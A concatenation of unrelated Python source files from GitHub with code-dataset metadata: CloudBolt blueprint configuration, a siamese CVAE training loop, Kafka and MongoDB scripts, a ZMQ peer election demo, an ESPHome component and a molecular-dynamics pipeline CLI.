f" {xui_version}. Running config.")
config_needed = True
except Exception:
logger.info(f"Config file not found going to run configuration")
config_needed = True
if config_needed:
logger.info("Running Configuration")
configure_xui()
try:
config
except NameError:
config = {}
config[XUI_NAME] = {
"current_version": xui_version,
"SET_ACTIONS_TO_REMOTE_SOURCE": SET_ACTIONS_TO_REMOTE_SOURCE,
"OVERWRITE_EXISTING_BLUEPRINTS": OVERWRITE_EXISTING_BLUEPRINTS
}
with open(CONFIG_FILE, 'w') as f:
json.dump(config, f, indent=4)
def configure_xui():
configure_tags()
configure_blueprints()
def configure_blueprints():
blueprints_dir = f'{XUI_PATH}/blueprints/'
for bp in os.listdir(blueprints_dir):
bp_dir = f'{blueprints_dir}{bp}/'
bp_path = f'{bp_dir}{bp}.json'
with open(bp_path, 'r') as f:
bp_json = json.load(f)
bp_name = bp_json["name"]
try:
bp_global_id = bp_json["id"]
except KeyError:
logger.warning(f"Blueprint: {bp_name} does not have an id. "
f"Skipping")
continue
bp, created = ServiceBlueprint.objects.get_or_create(
global_id=bp_global_id,
status='ACTIVE'
)
if not created:
if OVERWRITE_EXISTING_BLUEPRINTS:
logger.info(f"Overwriting Blueprint: {bp_name}")
else:
logger.info(f"Blueprint: {bp_name} already exists. Skipping")
continue
bp.remote_source_url = f'file://{bp_path}'
bp.save()
bp.refresh_from_remote_source()
logger.info(f"Finished refreshing: {bp_name} from remote source")
set_actions_to_remote_source(bp_dir, bp_json, created)
def set_actions_to_remote_source(bp_dir, bp_json, created):
if SET_ACTIONS_TO_REMOTE_SOURCE or created:
logger.info(f'Starting to set actions to remote source for BP: '
f'{bp_json["name"]}')
action_datas = [] # Tuples of (action_name, action_path)
elements = ["teardown_items", "deployment_items", "management_actions"]
for element in elements:
for action in bp_json[element]:
action_data = get_action_data(action, bp_dir, element)
action_datas.append(action_data)
for action_data in action_datas:
action_name, action_path = action_data
logger.info(f"Setting action: {action_name} to remote source")
set_action_to_remote_source(action_name, action_path)
else:
logger.info("Not setting actions to remote source. Update the "
"SET_ACTIONS_TO_REMOTE_SOURCE variable to True if you "
"want to do this")
return None
def set_action_to_remote_source(action_name, action_path):
try:
action = CloudBoltHook.objects.get(name=action_name)
action.source_code_url = f'file://{action_path}'
action.save()
except:
logger.warning(f"Could not find action: {action_name}, will not be "
f"able to set to remote source")
def get_action_data(action, bp_dir, item_name):
if item_name == 'management_actions':
file_name = slugify(action["label"]).replace("-", "_")
json_file = f'{file_name}.json'
json_path = f'{bp_dir}{file_name}/{file_name}/{json_file}'
action_name = action["label"]
else:
file_name = slugify(action["name"]).replace("-", "_")
json_file = f'{file_name}.json'
json_path = f'{bp_dir}{file_name}/{file_name}.json'
action_name = action["name"]
action_path = get_action_path_from_json(json_path, json_file)
return action_name, action_path
def get_action_path_from_json(json_path, json_file):
with open(json_path, 'r') as f:
action_json = json.load(f)
action_file = action_json["script_filename"]
action_path = json_path.replace(json_file, action_file)
return action_path
def configure_tags():
# Create the nsxt_tag parameter if it does not already exist
cf, _ = setup_nsx_tags()
# Add an NSXT parameter to any NSXT environments
rhs = ResourceHandler.objects.all()
for rh in rhs:
if check_for_nsxt(rh):
for env in rh.environment_set.all():
env.custom_fields.add(cf)
| mbomb67/cloudbolt_samples | cloudbolt_content/ui-extension-packages/nsxt/config.py | config.py | py | 6,538 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "utilities.logger.ThreadLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "os.path.abspath... |
26597485464 | import pdb, argparse
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision as thv
from torchvision import transforms
from torch.utils.data import Dataset, DataLoader
from CarlaDataset import CarlaDataset
from CVAE import CVAE
from siameseCVAE import siameseCVAE
def main():
model = siameseCVAE()
criterion = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999),
eps=1e-08, weight_decay=0)
epochs = 10
dl = DataLoader(CarlaDataset('../data/'))
for epoch in range(epochs):
for i, X in enumerate(dl):
img = X[0]
img_ = X[1]
ctrl_inputs = X[2]
img = (img/255).float()
img_ = (img_/255).float()
img1 = img[:,0,:,:,:]
img2 = img[:,1,:,:,:]
img1_ = img_[:,0,:,:,:]
img2_ = img_[:,1,:,:,:]
xhat, yhat, z, z_mean, z_stdev = model.forward(img1,img2,ctrl_inputs)
lossx = criterion(xhat,img1_)
lossy = criterion(yhat,img2_)
optimizer.zero_grad()
lossx.backward()
lossy.backward()
if (i+1) % 10 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch+1, epochs, i+1, total_step, loss.item()))
pdb.set_trace()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch_size', type=int, default=32)
# parser.add_argument('--lr', type=int, default=0.005)
args = parser.parse_args()
main() | klaywittler/latent-map-planning | model/train_siamese.py | train_siamese.py | py | 1,675 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "siameseCVAE.siameseCVAE",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "torch.optim.Adam",
... |
70028298274 | #!/bin/python
import argparse
import numpy as np
import pandas as pd
import time
import json
from datetime import datetime, timedelta
from confluent_kafka.avro import AvroProducer
def parse_args():
parser = argparse.ArgumentParser(description='Publish CSV records to a Kafka topic.')
parser.add_argument('--delta-minutes', '-d', default=2, type=int, help='Minutes to shift timestamps')
parser.add_argument('--input-file', '-i', default='../resources/ml-latest-small/ratings.csv',
help='Path to the CSV input file')
parser.add_argument('--output-topic', '-o', default='user-ratings-4', help='Output Kafka topic')
return parser.parse_args()
def transform_timestamps(df, start_time_adjusted, end_time_adjusted):
start_time_adjusted_ts = int(start_time_adjusted.timestamp() * 1000)
end_time_adjusted_ts = int(end_time_adjusted.timestamp() * 1000)
# Generate random timestamps within the time range
random_timestamps = np.random.randint(start_time_adjusted_ts, end_time_adjusted_ts, df.shape[0])
# Sort the random timestamps
sorted_timestamps = np.sort(random_timestamps)
# Assign sorted random timestamps to the DataFrame
df['timestamp'] = sorted_timestamps
return df
def setup_producer():
# Avro schema
# key schema not used due to streams dependency confusing key and value schemas
key_schema_str = json.dumps({
"namespace": "ratings",
"type": "record",
"name": "UserID",
"fields": [
{"name": "userId", "type": "int"}
]
})
value_schema_str = json.dumps({
"namespace": "ratings",
"type": "record",
"name": "Rating",
"fields": [
{"name": "userId", "type": "int"},
{"name": "movieId", "type": "int"},
{"name": "rating", "type": "float"},
{
"name": "timestamp",
"type": {
"type": "long",
"logicalType": "timestamp-millis"
}
}
]
})
# Producer configuration
producer = AvroProducer({
'bootstrap.servers': 'localhost:9092',
'schema.registry.url': 'http://localhost:8081'
}, default_value_schema=value_schema_str)
# }, default_value_schema=value_schema_str, default_key_schema=key_schema_str)
return producer
def send_batch(producer, batch, output_topic):
for value in batch:
producer.produce(
topic=output_topic,
# key=dict(userId=value['userId']),
value=value
)
def manage_loop(df, producer, output_topic):
total_count = df.shape[0]
record_count = 0
while not df.empty:
current_utc_ts = int(datetime.utcnow().timestamp() * 1000) # Convert this to UNIX milliseconds as well
past_rows = df[df['timestamp'] <= current_utc_ts]
if not past_rows.empty:
batch = past_rows.to_dict('records')
send_batch(producer, batch, output_topic)
batch_count = len(batch)
record_count += batch_count
current_time_str = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")
print(f"{current_time_str} - {batch_count} rows sent ({record_count}/{total_count})")
df = df[df['timestamp'] > current_utc_ts]
producer.flush()
time.sleep(1)
def main():
args = parse_args()
df = pd.read_csv(args.input_file)
start_time_adjusted = datetime.utcnow()
end_time_adjusted = start_time_adjusted + timedelta(minutes=args.delta_minutes)
df = transform_timestamps(df, start_time_adjusted, end_time_adjusted)
producer = setup_producer()
print(f"Started publishing records at {start_time_adjusted}")
manage_loop(df, producer, args.output_topic)
print(f"Finished publishing records at {datetime.utcnow()}")
if __name__ == "__main__":
main()
| brunoribeiro2k/movielens-events | src/main/python/publish-ratings.py | publish-ratings.py | py | 3,929 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.random.randint",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "numpy.... |
132504097 | import random
import sys
import threading
import time
from multiprocessing import Process
import zmq
import requests
from Crypto.Hash import SHA3_256
from Crypto.PublicKey import ECC
from Crypto.Signature import DSS
from Pyro4.util import json
n = int(sys.argv[2])
t = int(sys.argv[4])
endpoint = "http://localhost:5000/peers"
def peer_func(id):
mutex = threading.Lock()
ID = id
MyPORT = random.randrange(1300, 60000)
sign_key = ECC.generate(curve='NIST P-256')
verify_key = sign_key.public_key()
peer = {
"id": ID,
"port": MyPORT,
"public_key": verify_key.export_key(format='OpenSSH'),
"random_numbers_list": []}
res = requests.post(endpoint, json=peer)
peer["list"] = requests.get(endpoint).json()
peer["random_number"] = random.getrandbits(256)
ports = []
messages = []
for i in range(n):
ports.append(peer["list"][i]["port"])
context = zmq.Context()
num_sender = context.socket(zmq.PUB)
num_sender.bind("tcp://127.0.0.1:" + str(MyPORT))
time.sleep(1)
contexts = []
for k in range(n):
context2 = zmq.Context()
num_receiver = context2.socket(zmq.SUB)
num_receiver.connect("tcp://127.0.0.1:" + str(ports[(id + k) % n]))
time.sleep(0.5)
num_receiver.subscribe("")
contexts.append(num_receiver)
time.sleep(1)
num_sender.send_string(str(peer["random_number"]))
for k in range(n):
res = int(contexts[k].recv_string())
messages.append(res)
selection = 0
for message in messages:
selection = selection ^ message
time.sleep(0.01)
d = SHA3_256.new(selection.to_bytes(32, byteorder='big'))
for k in range(t - 1):
d = SHA3_256.new(d.digest())
selection = int.from_bytes(d.digest(), "big") % n
file = ""
for message in messages:
file += str(message) + "\n"
file += str(selection) + "\n"
time.sleep(1)
signer = DSS.new(sign_key, 'fips-186-3')
h = SHA3_256.new(file.encode('utf-8'))
signature = signer.sign(h)
file += str(int.from_bytes(signature, "big")) + "\n"
file += verify_key.export_key(format='OpenSSH')
time.sleep(1)
file_writer = open("sample_election_" + str(id) + ".log", "w")
file_writer.write(file)
file_writer.close()
if __name__ == "__main__":
procs = []
for i in range(n):
proc = Process(target=peer_func, args=(i,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
| Arda-Yurdakul/CS403-Term-Project | peers2.py | peers2.py | py | 2,651 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "threading.Lock",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"li... |
72059863395 | from esphome.components import number
from esphome.const import CONF_MAX_VALUE, CONF_MIN_VALUE, CONF_STEP
import esphome.config_validation as cv
import esphome.codegen as cg
from .. import fourheat_config_validation as fhcv
from .. import (
fourheat_ns,
CONF_DATAPOINT,
CONF_FOURHEAT_ID,
CONF_PARSER,
CONF_QUERY_DATAPOINT,
FourHeat,
get_parser_expression,
)
DEPENDENCIES = ["fourheat"]
FourHeatNumber = fourheat_ns.class_("FourHeatNumber", number.Number, cg.Component)
def validate_min_max(config):
if config[CONF_MAX_VALUE] <= config[CONF_MIN_VALUE]:
raise cv.Invalid("max_value must be greater than min_value")
return config
CONFIG_SCHEMA = cv.All(
number.number_schema(FourHeatNumber)
.extend(
{
cv.GenerateID(CONF_FOURHEAT_ID): cv.use_id(FourHeat),
cv.Required(CONF_DATAPOINT): fhcv.datapoint,
cv.Optional(CONF_QUERY_DATAPOINT): fhcv.datapoint,
cv.Optional(CONF_PARSER): cv.returning_lambda,
cv.Optional(CONF_MAX_VALUE, default=16777215.0): cv.float_,
cv.Optional(CONF_MIN_VALUE, default=-16777215.0): cv.float_,
cv.Optional(CONF_STEP, default=1): cv.positive_float,
}
)
.extend(cv.COMPONENT_SCHEMA),
validate_min_max,
)
async def to_code(config):
var = await number.new_number(
config,
min_value=config[CONF_MIN_VALUE],
max_value=config[CONF_MAX_VALUE],
step=config[CONF_STEP]
)
await cg.register_component(var, config)
parent = await cg.get_variable(config[CONF_FOURHEAT_ID])
cg.add(var.set_fourheat_parent(parent))
cg.add(var.set_datapoint_id(config[CONF_DATAPOINT]))
if CONF_QUERY_DATAPOINT in config:
cg.add(var.set_query_datapoint_id(config[CONF_QUERY_DATAPOINT]))
if CONF_PARSER in config:
parser = await get_parser_expression(config[CONF_PARSER], int)
cg.add(var.set_parser(parser))
| leoshusar/4heat-esphome | components/fourheat/number/__init__.py | __init__.py | py | 1,960 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "esphome.components.number.Number",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "esphome.components.number",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "esphome.codegen.Component",
"line_number": 19,
"usage_type": "attribute"
... |
32100442579 | from ase import Atoms
import numpy as np
atoms = Atoms(['O', 'H', 'H'], positions=[[0., 0., 0.119262],
[0., 0.763239, -0.477047],
[0., -0.763239, -0.477047]])
# Angle no pbc
assert abs(atoms.get_angle(1, 0, 2) - 104) < 1e-3
atoms.set_cell([2, 2, 2])
# Across different pbcs
atoms.set_pbc([True, False, True])
atoms.wrap()
assert abs(atoms.get_angle(1, 0, 2, mic=True) - 104) < 1e-3
# Across all True pbc
atoms.set_pbc(True)
atoms.wrap()
assert abs(atoms.get_angle(1, 0, 2, mic=True) - 104) < 1e-3
# Simple tetrahedron
tetra_pos = np.array([[0, 0, 0], [1, 0, 0], [.5, np.sqrt(3) * .5, 0],
[.5, np.sqrt(1/3.) * .5, np.sqrt(2/3.)]])
atoms = Atoms(['H', 'H', 'H', 'H'],
positions=tetra_pos - np.array([.2, 0, 0]))
angle = 70.5287793655
assert abs(atoms.get_dihedral(0, 1, 2, 3) - angle) < 1e-3
atoms.set_cell([3, 3, 3])
atoms.set_pbc(True)
atoms.wrap()
assert abs(atoms.get_dihedral(0, 1, 2, 3, mic=True) - angle) < 1e-3
| joliesla/Material-modelling | venv/Lib/site-packages/ase/test/atoms_angle.py | atoms_angle.py | py | 1,046 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "ase.Atoms",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 25,
... |
15201921852 | from argparse import ArgumentParser, HelpFormatter
import itertools
import sys
from pathlib import Path
# ============================================================================================================
# === DTN ARGUMENT PARSER CLASSES
# ============================================================================================================
class DtnArgumentParser(ArgumentParser):
''' Subclass of Python's native ArgumentParser that incorporates a function to display warning messages related
to the arguments.
'''
def __init__(self, *args, **kwargs):
''' Constructor simply calls ArgumentParser constructor '''
super().__init__(*args, **kwargs)
def warning(self, message):
''' Display a warning message related to one of the arguments. The format is consistent with that of errors
:param str message: Warning message to display
'''
print('{}: WARNING: {}\n'.format(self.prog, message))
def error(self, message):
print('{}: ERROR: {}\n'.format(self.prog, message))
self.print_help()
sys.exit(-1)
# ============================================================================================================
# === DTN ARGUMENT PARSE FUNCTIONS
# ============================================================================================================
def get_argument_parser():
''' Parse the command-line arguments for this program
:return ArchNetArgumentParser: The argument parser
'''
formatter = lambda prog: HelpFormatter(prog, max_help_position=50, width=200)
parser = DtnArgumentParser(prog='Dtn Simulator', formatter_class=formatter, description='DTN Network Simulator')
# Add required arguments for running in config file mode
parser.add_argument('-cf', '--configfile', help='configuration file path',
type=str, default=None, nargs='?')
# Add optional arguments
parser.add_argument('-v', '--validate', help='run unit tests',
action='store_true')
return parser
def dict_to_args_list(args):
argnames, argvals = zip(*args.items())
argnames = ['--' + name for name in argnames]
return itertools.chain.from_iterable(zip(argnames, argvals))
def process_arguments(args=None):
''' Process the arguments of the application and run ArchNet in batch or GUI mode depending on what is specified
:param None or dict:
'''
# Get argument parser
parser = get_argument_parser()
# If no arguments provided, use argument parser
if not args:
args = parser.parse_args()
elif isinstance(args, dict):
args = parser.parse_args(dict_to_args_list(args))
elif args != None:
raise RuntimeError('process_arguments: args can only be None or a dictionary')
if not args.configfile: return args
# Check the validity of the configuration file
configfile = Path(args.configfile)
if not configfile.exists():
raise FileExistsError(f'Configuration file {configfile} does not exist')
if configfile.suffix not in ['.yaml', '.yml']:
raise ValueError(f'The configuration file {configfile} is not a YAML file')
return args
| msancheznet/dtnsim | simulator/utils/DtnArgumentParser.py | DtnArgumentParser.py | py | 3,255 | python | en | code | 9 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "sys.exit",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "argparse.HelpFormatter",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "itertools.cha... |
41617267146 | """ Assignment 6 performance of Mango
"""
from ast import stmt
from pathlib import Path
import csv
import pathlib
from timeit import repeat, timeit as timer
import main
import users
import user_status
import pymongo
import pandas as pd
import random
import string
import time
import socialnetwork_model
letters = string.ascii_lowercase
# from pymongo import MongoClient
# from pymongo.errors import DuplicateKeyError
def add_random_users():
for n in range(500):
new_user_id = ''.join(random.choice(letters) for i in range(10))
add_user(new_user_id,"email","name","lastname",user_collection)
def add_random_status():
"""
search a 1000 records
"""
cdw = pathlib.Path.cwd()
# print(f"Reading {filename}\npath is {cdw}")
status_header = ["STATUS_ID","USER_ID","STATUS_TEXT"]
#global tatus_header
try:
filename = "status_updates.csv"
with open(filename, mode='r') as statusfile:
reader = csv.reader(statusfile, delimiter=',')
status_header = next(reader)
count = 0
# print(status_header)
for line in reader:
new_status_id = ''.join(random.choice(letters) for i in range(10))
add = main.add_status(new_status_id,line[1],line[2],status_collection)
count += 1
if count == 1000:
break
# print("added:",line[0], line[1], line[2])
statusfile.close()
# print(f'lines counted for Status: {count}')
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
def load_users(filename, user_collection):
"""
Load 1000 lines
"""
user_header = ["USER_ID", "EMAIL", "NAME", "LASTNAME"]
cdw = pathlib.Path.cwd()
# print(f"Reading{cdw} {filename}\npath is {cdw}")
try:
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
mydb = myclient["UserAccounts"]
# mongo_docs = mydb["Users"]
usercol = mydb["UserAccounts"]
# mongo_docs =
# print("drop the database")
# usercol.drop()
# df = pd.DataFrame(list(mongo_docs))
# df.to_csv(filename, index=False)
# return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
path = Path(filename)
print(path)
return False
except OSError:
return False
count = 0
try:
with open(filename, mode='r', newline='\n') as accountsfile:
# print(accountsfile)
reader = csv.reader(accountsfile, delimiter=',')
user_header = next(reader)
# print("header", user_header)
for row in reader:
count += 1
# USER_ID,NAME,LASTNAME,EMAIL (self, user_id, email, user_name, user_last_name)
# print("row",row[0], row[1], row[2], row[3])
# print("line",row)
load = add_user(row[0], row[3], row[1], row[2], user_collection)
if count == 1000:
break
# print(f"lines counted {count}")
accountsfile.close()
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def search_1000_status_updates(filename, status_collection):
"""
search a 1000 records
"""
cdw = pathlib.Path.cwd()
# print(f"Reading {filename}\npath is {cdw}")
status_header = ["STATUS_ID","USER_ID","STATUS_TEXT"]
#global tatus_header
try:
with open(filename, mode='r') as statusfile:
reader = csv.reader(statusfile, delimiter=',')
status_header = next(reader)
count = 0
# print(status_header)
for line in reader:
search = main.search_status(line[0], status_collection)
count += 1
if count == 1000:
break
# print("added:",line[0], line[1], line[2])
statusfile.close()
# print(f'lines counted for Status: {count}')
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def delete_status_updates(filename, status_collection):
"""
search a 1000 records
"""
cdw = pathlib.Path.cwd()
# print(f"Reading {filename}\npath is {cdw}")
status_header = ["STATUS_ID","USER_ID","STATUS_TEXT"]
#global tatus_header
try:
with open(filename, mode='r') as statusfile:
reader = csv.reader(statusfile, delimiter=',')
status_header = next(reader)
count = 0
# print(status_header)
for line in reader:
search = main.delete_status(line[0], status_collection)
count += 1
if count == 1000:
break
# print("added:",line[0], line[1], line[2])
# tatusfile.close()
# print(f'lines counted for Status: {count}')
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def search_1000_users(filename, user_collection):
"""
Load 1000 lines
"""
user_header = ["USER_ID", "EMAIL", "NAME", "LASTNAME"]
cdw = pathlib.Path.cwd()
count = 0
try:
with open(filename, mode='r', newline='\n') as accountsfile:
# print(accountsfile)
reader = csv.reader(accountsfile, delimiter=',')
user_header = next(reader)
# print("header", user_header)
for row in reader:
count += 1
# USER_ID,NAME,LASTNAME,EMAIL (self, user_id, email, user_name, user_last_name)
# print("row",row[0], row[1], row[2], row[3])
# print("line",row)
load = main.search_user(row[0], user_collection)
if count == 1000:
break
accountsfile.close()
# print(f"lines counted {count}")
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def delete_1000_users(filename, user_collection):
"""
delete 1000 lines
"""
user_header = ["USER_ID", "EMAIL", "NAME", "LASTNAME"]
cdw = pathlib.Path.cwd()
count = 0
try:
with open(filename, mode='r', newline='\n') as accountsfile:
# print(accountsfile)
reader = csv.reader(accountsfile, delimiter=',')
user_header = next(reader)
# print("header", user_header)
for row in reader:
count += 1
# USER_ID,NAME,LASTNAME,EMAIL (self, user_id, email, user_name, user_last_name)
# print("row",row[0], row[1], row[2], row[3])
load = main.delete_user(row[0], user_collection)
if count == 1000:
break
accountsfile.close()
# print(f"lines counted {count}")
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def init_user_collection():
'''
Creates and returns a new instance of UserCollection
'''
return users.UserCollection()
def init_status_collection():
"""
Creates and returns a new instance of UserStatusCollection
UserStatusCollection()
"""
return user_status.UserStatusCollection()
def add_user(user_id, email, user_name, user_last_name, user_collection):
"""add users with users: def add_user(self, user_id, email, user_name, user_last_name):
Creates a new instance of User and stores it in user_collection
(which is an instance of UserCollection)
"""
result = user_collection.add_user(user_id, email, user_name, user_last_name)
#print(user_id, email, user_name, user_last_name)
if result:
return True
else:
return False
def add_status(status_id, user_id, status_text, status_collection):
"""
Creates a new instance of UserStatus and stores it in
user_collection(which is an instance of UserStatusCollection)
Requirements:
- status_id cannot already exist in user_collection.
- Returns False if there are any errors (for example, if
user_collection.add_status() returns False).
- Otherwise, it returns True.
"""
status_collection = main.add_status(status_id, user_id, status_text,status_collection)
return status_collection
def load_status_updates(filename, status_collection):
"""
Asd a 1000 records
"""
try:
# myclient = pymongo.MongoClient("mongodb://localhost:27017/")
# mydb = myclient["StatusUpdates"]
# # mongo_docs = mydb["Users"]
# statuscol = mydb["StatusUpdates"]
# mongo_docs = statuscol.find({},{"_id":0})
with open(filename, mode='r') as statusfile:
reader = csv.reader(statusfile, delimiter=',')
status_header = next(reader)
count = 0
# print(status_header)
for line in reader:
#defadd_status(self, status_id, user_id, status_text):
# print(f"load {line}")
main.add_status(line[0], line[1], line[2],status_collection)
count += 1
if count == 1000:
break
# print("added:",line[0], line[1], line[2])
statusfile.close()
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
path = Path(filename)
print(path)
return False
except OSError:
return False
if __name__ == '__main__':
socialnetwork_model.User()
socialnetwork_model.UserStatus()
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
mydbs = myclient["StatusUpdates"]
# mongo_docs = mydb["Users"]
statusrcol = mydbs["StatusUpdates"]
statusrcol.drop()
mydb = myclient["UserAccounts"]
usercol = mydb["UserAccounts"]
usercol.drop()
socialnetwork_model.UserStatus()
status_collection = main.init_status_collection()
user_collection = main.init_user_collection()
reps = 2
luser = 'load=load_users("accounts.csv", user_collection)'
lstatus = 'load=load_status_updates("status_updates.csv",status_collection)'
time.sleep(1)
load_1000_users = timer(stmt=luser,globals=globals(),number=reps)
time.sleep(2)
load_1000_status = timer(stmt=lstatus,globals=globals(),number=reps)
# print(f"user mango load {load_1000_users}")
# print(f"Status MANGO load {load_1000_status}")
time.sleep(2)
susers = 'search_1000_users("accounts.csv", user_collection)'
sstatus = 'search_1000_status_updates("status_updates.csv",status_collection)'
search_1k_users = timer(stmt=susers,globals=globals(),number=reps)
time.sleep(1)
print(f"time to search mNGO 1000 users: , {search_1k_users}")
search_1k_updates = timer(stmt=sstatus,globals=globals(),number=reps)
print(f"time to search mango 1000 users: , {search_1k_users}")
time.sleep(1)
print(f"time to search mango 1000 updates , {search_1k_updates}")
time.sleep(1)
print(f"user mango load , {load_1000_users}")
print(f"Status mango load , {load_1000_status}")
add="add_random_users()"
add5kusers = timer(stmt=add,globals=globals(),number=reps)
adds = "add_random_status()"
add5kstatus = timer(stmt=adds,globals=globals(),number=reps)
dels = 'delete_status_updates("status_updates.csv",status_collection)'
#deletestatus = timer(stmt=dels,globals=globals(),number=1)
print(f"time to add 5k random user mango:, {add5kusers}")
print(f'tile to add random status mango: , {add5kstatus}')
delu = 'delete_1000_users("accounts.csv", user_collection)'
deletusers = timer(stmt=delu,globals=globals(),number=reps)
print(f"time to delete status mango: , {timer(stmt=dels,globals=globals(),number=1)}")
print(f"time to delete user mango: , {deletusers}")
| smichalove/Python320_University_of_Washington | time_mongo.py | time_mongo.py | py | 13,262 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "string.ascii_lowercase",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "random.choice",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pathlib.Path.cwd",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "pathlib.Pa... |
36365558628 | import os
import logging
"""
读取文件函数
"""
# ------------------------------
logging.basicConfig(
level=logging.DEBUG,
format="\033[37m[%(asctime)s] [%(pathname)s] (%(levelname)s-第%(lineno)d行) \n%(message)s\033[0m")
# ------------------------------
def open(self, all): # 读取文件夹内文件 # 输入路径
"""
:param self: 文件夹的路径
:param all: all==0:是xls文件;all==1:是所有文件
:return:输出所有文件名的列表
"""
try:
file_list = os.walk(self)
#print(file_list)
path_list=[]
count = 0
for ph in file_list:
#print(ph)
ph[0]==self
path_list = ph[2]
break
#count += len(path_list) # 计数器
while len(path_list) == 0:
raise Exception("错误路径或者该文件夹为空")
a = []
n = 0
for e in path_list:
if all == 1:
# print("读取文件", '%s' % n, e)
e = self + e
a.append(e)
if all == 0 and ".xls" in e:
# print("读取文件", '%s' % n, e)
e = self + e
a.append(e)
n = n + 1
return a
except Exception as e:
raise
#raise e("The folder is empty")
logging.info(e)
print("Path error")
return []
if __name__ == '__main__':
a=open('E:/HUMEI/核价/',all=1)
print(a)
| ramchan1988/HUMEI1 | os_file.py | os_file.py | py | 1,512 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.basicConfig",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line... |
46241357 | import logging
import os
import click
import pandas as pd
import tqdm
from mol_dyn.pipeline import pipeline
from mol_dyn.utils import load_smiles_csv
@click.command()
@click.option("--smiles_csv", required=True, help="Smiles csv")
@click.option("--output_folder", required=True, help="Output folder")
@click.option("--field", type=str, default="pcff", help="Force field")
@click.option("--steps", type=int, default=500000, help="Steps")
@click.option("--cores", type=int, default=8, help="Cores")
@click.option(
"--emc_template",
type=str,
default="mol_dyn/emc_template.esh",
help="Path to the emc template file in the mol_dyn folder",
)
@click.option(
"--lammps_template",
type=str,
default="mol_dyn/lammps_template.in",
help="Path to the lammps `template file in the mol_dyn folder",
)
def main(
smiles_csv: str,
output_folder: str,
field: str = "pcff",
steps: int = 500000,
cores: int = 8,
emc_template: str = "mol_dyn/emc_template.esh",
lammps_template: str = "mol_dyn/lammps_template.in",
):
logging.basicConfig(level="INFO")
smiles_data = load_smiles_csv(smiles_csv)
os.makedirs(output_folder, exist_ok=True)
status_dict = dict()
for i in tqdm.tqdm(range(len(smiles_data))):
# index corresponds to the indice of the row in the smiles csv. The scripts creates a folder for each index, making it easy to correlate the smiles to the simulation folder
index, smiles = smiles_data.iloc[i]["Indices"], smiles_data.iloc[i]["Smiles"]
folder_path = os.path.join(output_folder, str(index))
os.makedirs(folder_path, exist_ok=True)
status = pipeline(
folder_path, steps, cores, field, smiles, emc_template, lammps_template
)
if not status["gen_emc_file"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to generate emc input file."
)
elif not status["run_emc"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to run emc."
)
elif not status["gen_lammps_file"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to generate lammps input file."
)
elif not status["run_lammps"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to run lammps."
)
elif not status["gen_spectrum"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to create spectrum from simulation."
)
status_dict[index] = status
status_df = pd.DataFrame.from_dict(status_dict, orient="index")
logging.info(
"Success: {} of total {}: {:.3f}%".format(
status_df["gen_spectrum"].sum(),
